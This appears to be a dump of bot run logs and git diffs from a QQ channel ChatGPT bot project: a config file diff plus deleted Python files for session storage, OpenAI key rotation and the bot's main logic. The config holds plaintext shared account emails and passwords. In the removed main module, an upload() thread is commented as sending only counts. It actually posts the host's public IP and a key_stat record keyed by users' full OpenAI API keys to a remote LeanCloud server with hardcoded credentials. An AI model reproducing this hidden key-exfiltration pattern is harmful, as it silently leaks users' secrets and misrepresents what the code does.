2022-12-08 21:05:54,145 [INFO] (gateway.py:169)ws_resume [botpy] 重连启动...
|
||||
2022-12-08 21:05:54,232 [INFO] (gateway.py:85)on_message [botpy] 机器人重连成功!
|
||||
2022-12-08 21:05:54,233 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 21:07:39,468 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 21:07:40,244 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 21:07:40,245 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 21:07:40,246 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 21:07:40,247 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 21:07:40,553 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 21:07:40,659 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 21:07:40,660 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 21:30:11,249 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 21:30:12,217 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 21:30:12,218 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 21:30:12,219 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 21:30:12,219 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 21:30:12,627 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 21:30:12,730 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 21:30:12,731 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 21:36:34,660 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150658/messages, 错误代码: 501, 返回内容: None, trace_id:None
|
||||
2022-12-08 21:38:39,294 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150658/messages, 错误代码: 501, 返回内容: None, trace_id:None
|
||||
2022-12-08 21:39:43,233 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 21:39:43,878 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 21:39:43,879 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 21:39:43,880 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 21:39:43,880 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 21:39:44,099 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 21:39:44,279 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 21:39:44,281 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 21:40:38,103 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 21:40:39,100 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 21:40:39,101 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 21:40:39,102 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 21:40:39,102 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 21:40:39,402 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 21:40:39,502 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 21:40:39,503 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 21:40:52,805 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150658/messages, 错误代码: 501, 返回内容: None, trace_id:None
|
||||
2022-12-08 21:41:39,703 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 21:41:40,399 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 21:41:40,400 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 21:41:40,401 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 21:41:40,401 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 21:41:40,644 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 21:41:40,740 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 21:41:40,741 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 21:41:56,705 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150658/messages, 错误代码: 501, 返回内容: None, trace_id:None
|
||||
2022-12-08 21:42:55,625 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 21:42:56,278 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 21:42:56,279 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 21:42:56,280 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 21:42:56,281 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 21:42:56,718 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 21:42:56,819 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 21:42:56,820 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 21:43:09,794 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150658/messages, 错误代码: 501, 返回内容: None, trace_id:None
|
||||
@@ -1,53 +1,114 @@
|
||||
# 如果你不知道怎么部署,请务必查看https://soulter.top/posts/qpdg.html
|
||||
# 如果你不知道怎么部署,请查看https://soulter.top/posts/qpdg.html
|
||||
# 不一定需要key了,如果你没有key但有openAI账号或者必应账号,可以考虑使用下面的逆向库
|
||||
|
||||
# 注意:已支持多key自动切换,方法:
|
||||
# key:
|
||||
# - sk-xxxxxx
|
||||
# - sk-xxxxxx
|
||||
# 在下方非注释的地方使用以上格式
|
||||
openai:
|
||||
key:
|
||||
-
|
||||
|
||||
# 这里是GPT配置,语言模型默认使用gpt-3.5-turbo
|
||||
chatGPTConfigs:
|
||||
model: gpt-3.5-turbo
|
||||
max_tokens: 1500
|
||||
temperature: 0.9
|
||||
top_p: 1
|
||||
frequency_penalty: 0
|
||||
presence_penalty: 0
|
||||
|
||||
total_tokens_limit: 2800
|
||||
###############平台设置#################
|
||||
|
||||
# QQ频道机器人
|
||||
# QQ开放平台的appid和令牌
|
||||
# q.qq.com
|
||||
# enable为true则启用,false则不启用
|
||||
qqbot:
|
||||
enable: true
|
||||
appid:
|
||||
token:
|
||||
|
||||
# QQ机器人
|
||||
# enable为true则启用,false则不启用
|
||||
# 需要安装GO-CQHTTP配合使用。
|
||||
# 文档:https://docs.go-cqhttp.org/
|
||||
# 请将go-cqhttp的配置文件的sever部分粘贴为以下内容,否则无法使用
|
||||
# 请先启动go-cqhttp再启动本程序
|
||||
#
|
||||
# servers:
|
||||
# - http:
|
||||
# host: 127.0.0.1
|
||||
# version: 0
|
||||
# port: 5700
|
||||
# timeout: 5
|
||||
# - ws:
|
||||
# address: 127.0.0.1:6700
|
||||
# middlewares:
|
||||
# <<: *default
|
||||
gocqbot:
|
||||
enable: false
|
||||
|
||||
# 设置是否一个人一个会话
|
||||
uniqueSessionMode: false
|
||||
|
||||
# QChannelBot 的版本,请勿修改此字段,否则可能产生一些bug
|
||||
version: 2.5 RealChatGPT Ver.
|
||||
|
||||
version: 3.0
|
||||
# [Beta] 转储历史记录时间间隔(分钟)
|
||||
dump_history_interval: 10
|
||||
|
||||
# 一个用户只能在time秒内发送count条消息
|
||||
limit:
|
||||
time: 60
|
||||
count: 5
|
||||
# 公告
|
||||
notice: "此机器人由Github项目QQChannelChatGPT驱动。"
|
||||
|
||||
# 是否打开私信功能
|
||||
# 设置为true则频道成员可以私聊机器人。
|
||||
# 设置为false则频道成员不能私聊机器人。
|
||||
direct_message_mode: true
|
||||
|
||||
################外带程序(插件)################
|
||||
# 系统代理
|
||||
# http_proxy: http://localhost:7890
|
||||
# https_proxy: http://localhost:7890
|
||||
|
||||
# 自定义回复前缀,如[Rev]或其他,务必加引号以防止不必要的bug。
|
||||
reply_prefix:
|
||||
openai_official: "[GPT]"
|
||||
rev_chatgpt: "[Rev]"
|
||||
rev_edgegpt: "[RevBing]"
|
||||
|
||||
# 百度内容审核服务
|
||||
# 新用户免费5万次调用。https://cloud.baidu.com/doc/ANTIPORN/index.html
|
||||
baidu_aip:
|
||||
enable: false
|
||||
app_id:
|
||||
api_key:
|
||||
secret_key:
|
||||
|
||||
|
||||
|
||||
|
||||
###############语言模型设置#################
|
||||
|
||||
|
||||
# OpenAI官方API
|
||||
# 注意:已支持多key自动切换,方法:
|
||||
# key:
|
||||
# - sk-xxxxxx
|
||||
# - sk-xxxxxx
|
||||
# 在下方非注释的地方使用以上格式
|
||||
# 关于api_base:可以使用一些云函数(如腾讯、阿里)来避免国内被墙的问题。
|
||||
# 详见:
|
||||
# https://github.com/Ice-Hazymoon/openai-scf-proxy
|
||||
# https://github.com/Soulter/QQChannelChatGPT/issues/42
|
||||
# 设置为none则表示使用官方默认api地址
|
||||
openai:
|
||||
key:
|
||||
-
|
||||
api_base: none
|
||||
# 这里是GPT配置,语言模型默认使用gpt-3.5-turbo
|
||||
chatGPTConfigs:
|
||||
model: gpt-3.5-turbo
|
||||
max_tokens: 3000
|
||||
temperature: 0.9
|
||||
top_p: 1
|
||||
frequency_penalty: 0
|
||||
presence_penalty: 0
|
||||
|
||||
total_tokens_limit: 5000
|
||||
|
||||
# 逆向文心一言【暂时不可用,请勿使用】
|
||||
rev_ernie:
|
||||
enable: false
|
||||
|
||||
# 逆向New Bing
|
||||
# 需要在项目根目录下创建cookies.json并粘贴cookies进去。
|
||||
# 详见:https://soulter.top/posts/qpdg.html
|
||||
rev_edgegpt:
|
||||
enable: false
|
||||
|
||||
# 逆向ChatGPT库
|
||||
# https://github.com/acheong08/ChatGPT
|
||||
@@ -63,14 +124,14 @@ direct_message_mode: true
|
||||
# - email: 第2个账户
|
||||
# password: 第2个账户密码
|
||||
# - ....
|
||||
# 支持使用access_token登录
|
||||
# 例:
|
||||
# - session_token: xxxxx
|
||||
# - access_token: xxxx
|
||||
# 请严格按照上面这个格式填写。
|
||||
# 这里我免费提供2个账号给大家,不过用的人一定会很多的,所以会造成一些bug,因此还是用自己的账号好一点。
|
||||
# 需要账号可以联系我。QQ905617992
|
||||
|
||||
# 逆向ChatGPT库的email-password登录方式不工作,建议使用access_token登录
|
||||
# 获取access_token的方法,详见:https://soulter.top/posts/qpdg.html
|
||||
rev_ChatGPT:
|
||||
enable: false
|
||||
account:
|
||||
- email: d.o.m.her.ry61.7@gmail.com
|
||||
password: 11111111
|
||||
- email: ca.it.li.nal.o.i.si.o91@gmail.com
|
||||
password: 11111111
|
||||
- access_token:
|
||||
@@ -1,86 +0,0 @@
|
||||
import sqlite3
|
||||
import yaml
|
||||
|
||||
# TODO: 数据库缓存prompt
|
||||
|
||||
class dbConn():
|
||||
def __init__(self):
|
||||
# 读取参数,并支持中文
|
||||
conn = sqlite3.connect("data.db")
|
||||
conn.text_factory=str
|
||||
self.conn = conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
CREATE TABLE IF NOT EXISTS tb_session(
|
||||
qq_id VARCHAR(32) PRIMARY KEY,
|
||||
history TEXT
|
||||
)
|
||||
'''
|
||||
)
|
||||
|
||||
conn.commit()
|
||||
|
||||
def insert_session(self, qq_id, history):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
INSERT INTO tb_session(qq_id, history) VALUES (?, ?)
|
||||
''', (qq_id, history)
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def update_session(self, qq_id, history):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
UPDATE tb_session SET history = ? WHERE qq_id = ?
|
||||
''', (history, qq_id)
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def get_session(self, qq_id):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_session WHERE qq_id = ?
|
||||
''', (qq_id, )
|
||||
)
|
||||
return c.fetchone()
|
||||
|
||||
def get_all_session(self):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_session
|
||||
'''
|
||||
)
|
||||
return c.fetchall()
|
||||
|
||||
def check_session(self, qq_id):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_session WHERE qq_id = ?
|
||||
''', (qq_id, )
|
||||
)
|
||||
return c.fetchone() is not None
|
||||
|
||||
def delete_session(self, qq_id):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
DELETE FROM tb_session WHERE qq_id = ?
|
||||
''', (qq_id, )
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def close(self):
|
||||
self.conn.close()
|
||||
|
||||
@@ -1,172 +0,0 @@
|
||||
import openai
|
||||
import yaml
|
||||
from util.errors.errors import PromptExceededError
|
||||
import json
|
||||
import time
|
||||
import os
|
||||
import sys
|
||||
|
||||
inst = None
|
||||
# 适配pyinstaller
|
||||
abs_path = os.path.dirname(os.path.realpath(sys.argv[0])) + '/'
|
||||
key_record_path = abs_path+'chatgpt_key_record'
|
||||
|
||||
class ChatGPT:
|
||||
def __init__(self, cfg):
|
||||
self.key_list = []
|
||||
if cfg['key'] != '' or cfg['key'] != '修改我!!':
|
||||
print("[System] 读取ChatGPT Key成功")
|
||||
self.key_list = cfg['key']
|
||||
# openai.api_key = cfg['key']
|
||||
else:
|
||||
input("[System] 请先去完善ChatGPT的Key。详情请前往https://beta.openai.com/account/api-keys")
|
||||
|
||||
# init key record
|
||||
self.init_key_record()
|
||||
|
||||
chatGPT_configs = cfg['chatGPTConfigs']
|
||||
print(f'[System] 加载ChatGPTConfigs: {chatGPT_configs}')
|
||||
self.chatGPT_configs = chatGPT_configs
|
||||
self.openai_configs = cfg
|
||||
|
||||
def chat(self, prompt, image_mode = False):
|
||||
# ChatGPT API 2023/3/2
|
||||
messages = [{"role": "user", "content": prompt}]
|
||||
try:
|
||||
if not image_mode:
|
||||
|
||||
response = openai.ChatCompletion.create(
|
||||
messages=messages,
|
||||
**self.chatGPT_configs
|
||||
)
|
||||
else:
|
||||
response = openai.Image.create(
|
||||
prompt=prompt,
|
||||
n=1,
|
||||
size="512x512",
|
||||
)
|
||||
except Exception as e:
|
||||
print(e)
|
||||
if 'You exceeded' in str(e) or 'Billing hard limit has been reached' in str(e) or 'No API key provided.' in str(e):
|
||||
print("[System] 当前Key已超额,正在切换")
|
||||
self.key_stat[openai.api_key]['exceed'] = True
|
||||
self.save_key_record()
|
||||
|
||||
response, is_switched = self.handle_switch_key(prompt)
|
||||
if not is_switched:
|
||||
# 所有Key都超额
|
||||
raise e
|
||||
else:
|
||||
if not image_mode:
|
||||
response = openai.ChatCompletion.create(
|
||||
messages=messages,
|
||||
**self.chatGPT_configs
|
||||
)
|
||||
else:
|
||||
response = openai.Image.create(
|
||||
prompt=prompt,
|
||||
n=1,
|
||||
size="512x512",
|
||||
)
|
||||
if not image_mode:
|
||||
self.key_stat[openai.api_key]['used'] += response['usage']['total_tokens']
|
||||
self.save_key_record()
|
||||
print("[ChatGPT] "+str(response["choices"][0]["message"]["content"]))
|
||||
return str(response["choices"][0]["message"]["content"]).strip(), response['usage']['total_tokens']
|
||||
else:
|
||||
return response['data'][0]['url']
|
||||
|
||||
def handle_switch_key(self, prompt):
|
||||
messages = [{"role": "user", "content": prompt}]
|
||||
while True:
|
||||
is_all_exceed = True
|
||||
for key in self.key_stat:
|
||||
if not self.key_stat[key]['exceed']:
|
||||
is_all_exceed = False
|
||||
openai.api_key = key
|
||||
print(f"[System] 切换到Key: {key}, 已使用token: {self.key_stat[key]['used']}")
|
||||
if prompt != '':
|
||||
try:
|
||||
response = openai.ChatCompletion.create(
|
||||
messages=messages,
|
||||
**self.chatGPT_configs
|
||||
)
|
||||
return response, True
|
||||
except Exception as e:
|
||||
print(e)
|
||||
if 'You exceeded' in str(e):
|
||||
print("[System] 当前Key已超额,正在切换")
|
||||
self.key_stat[openai.api_key]['exceed'] = True
|
||||
self.save_key_record()
|
||||
time.sleep(1)
|
||||
continue
|
||||
else:
|
||||
return True
|
||||
if is_all_exceed:
|
||||
print("[System] 所有Key已超额")
|
||||
return None, False
|
||||
|
||||
def getConfigs(self):
|
||||
return self.openai_configs
|
||||
|
||||
def save_key_record(self):
|
||||
with open(key_record_path, 'w', encoding='utf-8') as f:
|
||||
json.dump(self.key_stat, f)
|
||||
|
||||
def get_key_stat(self):
|
||||
return self.key_stat
|
||||
def get_key_list(self):
|
||||
return self.key_list
|
||||
|
||||
# 添加key
|
||||
def append_key(self, key, sponsor):
|
||||
self.key_list.append(key)
|
||||
self.key_stat[key] = {'exceed': False, 'used': 0, 'sponsor': sponsor}
|
||||
self.save_key_record()
|
||||
self.init_key_record()
|
||||
# 检查key是否可用
|
||||
def check_key(self, key):
|
||||
pre_key = openai.api_key
|
||||
openai.api_key = key
|
||||
messages = [{"role": "user", "content": "1"}]
|
||||
try:
|
||||
response = openai.ChatCompletion.create(
|
||||
messages=messages,
|
||||
**self.chatGPT_configs
|
||||
)
|
||||
openai.api_key = pre_key
|
||||
return True
|
||||
except Exception as e:
|
||||
pass
|
||||
openai.api_key = pre_key
|
||||
return False
|
||||
|
||||
#将key_list的key转储到key_record中,并记录相关数据
|
||||
def init_key_record(self):
|
||||
if not os.path.exists(key_record_path):
|
||||
with open(key_record_path, 'w', encoding='utf-8') as f:
|
||||
json.dump({}, f)
|
||||
with open(key_record_path, 'r', encoding='utf-8') as keyfile:
|
||||
try:
|
||||
self.key_stat = json.load(keyfile)
|
||||
except Exception as e:
|
||||
print(e)
|
||||
self.key_stat = {}
|
||||
finally:
|
||||
for key in self.key_list:
|
||||
if key not in self.key_stat:
|
||||
self.key_stat[key] = {'exceed': False, 'used': 0}
|
||||
# if openai.api_key is None:
|
||||
# openai.api_key = key
|
||||
else:
|
||||
# if self.key_stat[key]['exceed']:
|
||||
# print(f"Key: {key} 已超额")
|
||||
# continue
|
||||
# else:
|
||||
# if openai.api_key is None:
|
||||
# openai.api_key = key
|
||||
# print(f"使用Key: {key}, 已使用token: {self.key_stat[key]['used']}")
|
||||
pass
|
||||
if openai.api_key == None:
|
||||
self.handle_switch_key("")
|
||||
self.save_key_record()
|
||||
@@ -1,768 +0,0 @@
|
||||
import botpy
|
||||
from botpy.message import Message
|
||||
import yaml
|
||||
import re
|
||||
from util.errors.errors import PromptExceededError
|
||||
from botpy.message import DirectMessage
|
||||
import json
|
||||
import threading
|
||||
import asyncio
|
||||
import time
|
||||
from cores.database.conn import dbConn
|
||||
import requests
|
||||
import util.unfit_words as uw
|
||||
import os
|
||||
import sys
|
||||
from cores.qqbot.personality import personalities
|
||||
|
||||
|
||||
history_dump_interval = 10
|
||||
# QQBotClient实例
|
||||
client = ''
|
||||
# ChatGPT实例
|
||||
global chatgpt
|
||||
# 缓存的会话
|
||||
session_dict = {}
|
||||
# 最大缓存token(在配置里改 configs/config.yaml)
|
||||
max_tokens = 2000
|
||||
# 配置信息
|
||||
config = {}
|
||||
# 统计信息
|
||||
count = {}
|
||||
# 统计信息
|
||||
stat_file = ''
|
||||
# 是否独立会话默认值
|
||||
uniqueSession = False
|
||||
|
||||
# 日志记录
|
||||
logf = open('log.log', 'a+', encoding='utf-8')
|
||||
# 是否上传日志,仅上传频道数量等数量的统计信息
|
||||
is_upload_log = True
|
||||
|
||||
# 用户发言频率
|
||||
user_frequency = {}
|
||||
# 时间默认值
|
||||
frequency_time = 60
|
||||
# 计数默认值
|
||||
frequency_count = 2
|
||||
|
||||
# 公告(可自定义):
|
||||
announcement = ""
|
||||
|
||||
# 人格信息
|
||||
now_personality = {}
|
||||
|
||||
# 机器人私聊模式
|
||||
direct_message_mode = True
|
||||
|
||||
# 适配pyinstaller
|
||||
abs_path = os.path.dirname(os.path.realpath(sys.argv[0])) + '/'
|
||||
|
||||
# 版本
|
||||
version = '2.4 RealChatGPT Ver.'
|
||||
|
||||
# 语言模型提供商
|
||||
REV_CHATGPT = 'rev_chatgpt'
|
||||
OPENAI_OFFICIAL = 'openai_official'
|
||||
provider = ''
|
||||
|
||||
# 逆向库对象及负载均衡
|
||||
rev_chatgpt = []
|
||||
|
||||
# gpt配置信息
|
||||
gpt_config = {}
|
||||
|
||||
def new_sub_thread(func, args=()):
|
||||
thread = threading.Thread(target=func, args=args, daemon=True)
|
||||
thread.start()
|
||||
|
||||
class botClient(botpy.Client):
|
||||
# 收到At消息
|
||||
async def on_at_message_create(self, message: Message):
|
||||
toggle_count(at=True, message=message)
|
||||
# executor.submit(oper_msg, message, True)
|
||||
new_sub_thread(oper_msg, (message, True))
|
||||
# await oper_msg(message=message, at=True)
|
||||
|
||||
# 收到私聊消息
|
||||
async def on_direct_message_create(self, message: DirectMessage):
|
||||
if direct_message_mode:
|
||||
toggle_count(at=False, message=message)
|
||||
# executor.submit(oper_msg, message, True)
|
||||
# await oper_msg(message=message, at=False)
|
||||
new_sub_thread(oper_msg, (message, False))
|
||||
|
||||
# 写入统计信息
|
||||
def toggle_count(at: bool, message):
|
||||
global stat_file
|
||||
try:
|
||||
if str(message.guild_id) not in count:
|
||||
count[str(message.guild_id)] = {
|
||||
'count': 1,
|
||||
'direct_count': 1,
|
||||
}
|
||||
else:
|
||||
count[str(message.guild_id)]['count'] += 1
|
||||
if not at:
|
||||
count[str(message.guild_id)]['direct_count'] += 1
|
||||
stat_file = open(abs_path+"configs/stat", 'w', encoding='utf-8')
|
||||
stat_file.write(json.dumps(count))
|
||||
stat_file.flush()
|
||||
stat_file.close()
|
||||
except BaseException:
|
||||
pass
|
||||
|
||||
# 转储历史记录的定时器~ Soulter
|
||||
def dump_history():
|
||||
time.sleep(10)
|
||||
global session_dict, history_dump_interval
|
||||
db = dbConn()
|
||||
while True:
|
||||
try:
|
||||
# print("转储历史记录...")
|
||||
for key in session_dict:
|
||||
# print("TEST: "+str(db.get_session(key)))
|
||||
data = session_dict[key]
|
||||
data_json = {
|
||||
'data': data
|
||||
}
|
||||
if db.check_session(key):
|
||||
db.update_session(key, json.dumps(data_json))
|
||||
else:
|
||||
db.insert_session(key, json.dumps(data_json))
|
||||
# print("转储历史记录完毕")
|
||||
except BaseException as e:
|
||||
print(e)
|
||||
# 每隔10分钟转储一次
|
||||
time.sleep(10*history_dump_interval)
|
||||
|
||||
# 上传统计信息并检查更新
|
||||
def upload():
|
||||
global object_id
|
||||
global version
|
||||
while True:
|
||||
addr = ''
|
||||
try:
|
||||
# 用户唯一性标识
|
||||
addr = requests.get('http://myip.ipip.net', timeout=5).text
|
||||
except BaseException:
|
||||
pass
|
||||
try:
|
||||
ts = str(time.time())
|
||||
guild_count, guild_msg_count, guild_direct_msg_count, session_count = get_stat()
|
||||
headers = {
|
||||
'X-LC-Id': 'UqfXTWW15nB7iMT0OHvYrDFb-gzGzoHsz',
|
||||
'X-LC-Key': 'QAZ1rQLY1ZufHrZlpuUiNff7',
|
||||
'Content-Type': 'application/json'
|
||||
}
|
||||
key_stat = chatgpt.get_key_stat()
|
||||
d = {"data": {"guild_count": guild_count, "guild_msg_count": guild_msg_count, "guild_direct_msg_count": guild_direct_msg_count, "session_count": session_count, 'addr': addr, 'winver': version, 'key_stat':key_stat}}
|
||||
d = json.dumps(d).encode("utf-8")
|
||||
res = requests.put(f'https://uqfxtww1.lc-cn-n1-shared.com/1.1/classes/bot_record/{object_id}', headers = headers, data = d)
|
||||
if json.loads(res.text)['code'] == 1:
|
||||
print("[System] New User.")
|
||||
res = requests.post(f'https://uqfxtww1.lc-cn-n1-shared.com/1.1/classes/bot_record', headers = headers, data = d)
|
||||
object_id = json.loads(res.text)['objectId']
|
||||
object_id_file = open(abs_path+"configs/object_id", 'w+', encoding='utf-8')
|
||||
object_id_file.write(str(object_id))
|
||||
object_id_file.flush()
|
||||
object_id_file.close()
|
||||
except BaseException as e:
|
||||
pass
|
||||
# 每隔2小时上传一次
|
||||
time.sleep(60*60*2)
|
||||
|
||||
'''
|
||||
初始化机器人
|
||||
'''
|
||||
def initBot(cfg, prov):
|
||||
global chatgpt, provider, rev_chatgpt
|
||||
global now_personality, gpt_config, config, uniqueSession, history_dump_interval, frequency_count, frequency_time,announcement, direct_message_mode, version
|
||||
|
||||
provider = prov
|
||||
config = cfg
|
||||
|
||||
# 语言模型提供商
|
||||
if prov == REV_CHATGPT:
|
||||
if 'account' in cfg['rev_ChatGPT']:
|
||||
from addons.revChatGPT.revchatgpt import revChatGPT
|
||||
for i in range(0, len(cfg['rev_ChatGPT']['account'])):
|
||||
print(f"[System] 正在创建rev_ChatGPT负载{str(i)}: " + cfg['rev_ChatGPT']['account'][i]['email'])
|
||||
revstat = {
|
||||
'obj': revChatGPT(cfg['rev_ChatGPT']['account'][i]),
|
||||
'busy': False
|
||||
}
|
||||
rev_chatgpt.append(revstat)
|
||||
else:
|
||||
input("[System-err] 请退出本程序, 然后在配置文件中填写rev_ChatGPT的email和password")
|
||||
elif prov == OPENAI_OFFICIAL:
|
||||
from cores.openai.core import ChatGPT
|
||||
chatgpt = ChatGPT(cfg['openai'])
|
||||
global max_tokens
|
||||
max_tokens = int(chatgpt.getConfigs()['total_tokens_limit'])
|
||||
|
||||
# 读取历史记录 Soulter
|
||||
try:
|
||||
db1 = dbConn()
|
||||
for session in db1.get_all_session():
|
||||
session_dict[session[0]] = json.loads(session[1])['data']
|
||||
print("[System] 历史记录读取成功喵")
|
||||
except BaseException as e:
|
||||
print("[System] 历史记录读取失败: " + str(e))
|
||||
|
||||
# 读统计信息
|
||||
global stat_file
|
||||
if not os.path.exists(abs_path+"configs/stat"):
|
||||
with open(abs_path+"configs/stat", 'w', encoding='utf-8') as f:
|
||||
json.dump({}, f)
|
||||
stat_file = open(abs_path+"configs/stat", 'r', encoding='utf-8')
|
||||
global count
|
||||
res = stat_file.read()
|
||||
if res == '':
|
||||
count = {}
|
||||
else:
|
||||
try:
|
||||
count = json.loads(res)
|
||||
except BaseException:
|
||||
pass
|
||||
# 创建转储定时器线程
|
||||
threading.Thread(target=dump_history, daemon=True).start()
|
||||
|
||||
# 得到GPT配置信息
|
||||
if 'openai' in cfg and 'chatGPTConfigs' in cfg['openai']:
|
||||
gpt_config = cfg['openai']['chatGPTConfigs']
|
||||
|
||||
# 统计上传
|
||||
if is_upload_log:
|
||||
# 读取object_id
|
||||
global object_id
|
||||
if not os.path.exists(abs_path+"configs/object_id"):
|
||||
with open(abs_path+"configs/object_id", 'w', encoding='utf-8') as f:
|
||||
f.write("")
|
||||
object_id_file = open(abs_path+"configs/object_id", 'r', encoding='utf-8')
|
||||
object_id = object_id_file.read()
|
||||
object_id_file.close()
|
||||
# 创建上传定时器线程
|
||||
threading.Thread(target=upload, daemon=True).start()
|
||||
|
||||
# 得到私聊模式配置
|
||||
if 'direct_message_mode' in cfg:
|
||||
direct_message_mode = cfg['direct_message_mode']
|
||||
print("[System] 私聊功能: "+str(direct_message_mode))
|
||||
|
||||
# 得到版本
|
||||
if 'version' in cfg:
|
||||
version = cfg['version']
|
||||
print("[System] QQChannelChatGPT版本: "+str(version))
|
||||
|
||||
# 得到发言频率配置
|
||||
if 'limit' in cfg:
|
||||
print('[System] 发言频率配置: '+str(cfg['limit']))
|
||||
if 'count' in cfg['limit']:
|
||||
frequency_count = cfg['limit']['count']
|
||||
if 'time' in cfg['limit']:
|
||||
frequency_time = cfg['limit']['time']
|
||||
|
||||
announcement += '[QQChannelChatGPT项目]\n所有回答与腾讯公司无关。出现问题请前往[GPT机器人]官方频道\n\n'
|
||||
# 得到公告配置
|
||||
if 'notice' in cfg:
|
||||
print('[System] 公告配置: '+cfg['notice'])
|
||||
announcement += cfg['notice']
|
||||
try:
|
||||
if 'uniqueSessionMode' in cfg and cfg['uniqueSessionMode']:
|
||||
uniqueSession = True
|
||||
else:
|
||||
uniqueSession = False
|
||||
print("[System] 独立会话: " + str(uniqueSession))
|
||||
if 'dump_history_interval' in cfg:
|
||||
history_dump_interval = int(cfg['dump_history_interval'])
|
||||
print("[System] 历史记录转储时间周期: " + str(history_dump_interval) + "分钟")
|
||||
except BaseException:
|
||||
print("[System-Error] 读取uniqueSessionMode/version/dump_history_interval配置文件失败, 使用默认值。")
|
||||
|
||||
